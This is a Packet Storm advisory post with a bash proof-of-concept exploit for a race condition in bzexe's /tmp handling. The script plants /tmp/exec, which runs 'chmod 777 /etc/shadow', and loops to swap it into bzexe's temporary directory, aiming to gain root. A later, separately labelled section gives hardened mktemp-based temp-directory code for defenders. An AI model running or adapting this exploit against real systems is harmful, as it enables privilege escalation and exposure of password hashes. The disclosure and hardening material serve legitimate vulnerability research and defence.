bzexe /tmp Race Condition

Larry W. Cashdollar, packetstormsecurity.com, 2011-11-06 (PACKETSTORM:106636)

EPSS: 0.0004 (Low), percentile 11.1%
Hi Packetstorm,

This PoC exploit was developed after a discussion on the Full-disclosure
mailing list, where
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862
was proved to be exploitable. A user can wait until a binary that was
compressed with bzexe is run by root and execute /tmp/exec. This could be used
to gain access as any user executing a bzexe-compressed binary as well.

It's probably not common to have binaries compressed unless you're on an
embedded system.

---- Begin------

```bash
#!/bin/bash
#gain root on a system using bzexe to compress binaries
#/tmp/exec will be executed as the executing user if we win the race.
#Larry W. Cashdollar http://www.downspout.org (credit vladz with discovery)
#http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862
#create /tmp/exec beforehand

#echo "Creating malicious script."

echo "#!/bin/sh" > /tmp/exec
echo "chmod 777 /etc/shadow" >> /tmp/exec
chmod 755 /tmp/exec

mkdir /tmp/$1
while true ;
do
if [ -a /tmp/$1/gztmp* ]
then
# echo "Exploiting bzexe."
mv /tmp/$1 /tmp/$1.dir
# echo "Copying our evil code into place."
cp /tmp/exec /tmp/$1
fi
done
```

--- End---
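Added here as a defender's illustration, not code from the post or from bzexe itself: the temp-directory discipline that removes this class of race from a self-extracting shell wrapper, with the predictable-path pattern shown only for contrast. It assumes GNU coreutils (mktemp -d, stat -c) and a writable ${TMPDIR:-/tmp}; the function names are made up for the example.

```bash
#!/bin/bash
# Added illustration, not bzexe's own code: temp-directory handling that
# closes the /tmp race a self-extracting wrapper is exposed to.
# Assumes GNU coreutils (mktemp -d, stat -c) and a writable ${TMPDIR:-/tmp}.

# Weak pattern, shown for contrast: the name is predictable from the PID, and
# mkdir -p silently accepts a directory another user created in advance, so
# whatever the wrapper later executes from it is under that user's control.
weak_tmpdir() {
    local dir="${TMPDIR:-/tmp}/gztmp$$"
    mkdir -p "$dir" || return 1
    printf '%s\n' "$dir"
}

# Hardened pattern: mktemp -d atomically creates a fresh 0700 directory with an
# unpredictable name and fails instead of reusing an existing path. The result
# is still verified (not a symlink, owned by us, mode 0700) before any use.
safe_tmpdir() {
    local dir
    dir=$(mktemp -d "${TMPDIR:-/tmp}/gztmp.XXXXXXXXXX") || return 1
    if [ -L "$dir" ] || [ "$(stat -c '%u:%a' "$dir")" != "$(id -u):700" ]; then
        rm -rf "$dir"
        return 1
    fi
    printf '%s\n' "$dir"
}

# Place the decompressed payload only if nothing exists at the target yet:
# with noclobber (set -C) the redirection becomes an O_EXCL create and fails
# on a pre-planted file instead of reusing it.
# $1 = source file, $2 = directory obtained from safe_tmpdir
extract_into() {
    local dest="$2/payload"
    ( set -C; : > "$dest" ) 2>/dev/null || return 1
    chmod 700 "$dest" && cat "$1" > "$dest"
}

# Returns 0 only if the hardened path rejects a planted payload and still
# succeeds on a clean directory.
check_hardening() {
    local d
    d=$(safe_tmpdir) || return 1
    : > "$d/payload"                        # constructed: file planted in advance
    if extract_into /dev/null "$d"; then rm -rf "$d"; return 1; fi
    rm -rf "$d"
    d=$(safe_tmpdir) || return 1
    extract_into /dev/null "$d" || { rm -rf "$d"; return 1; }
    rm -rf "$d"
}
```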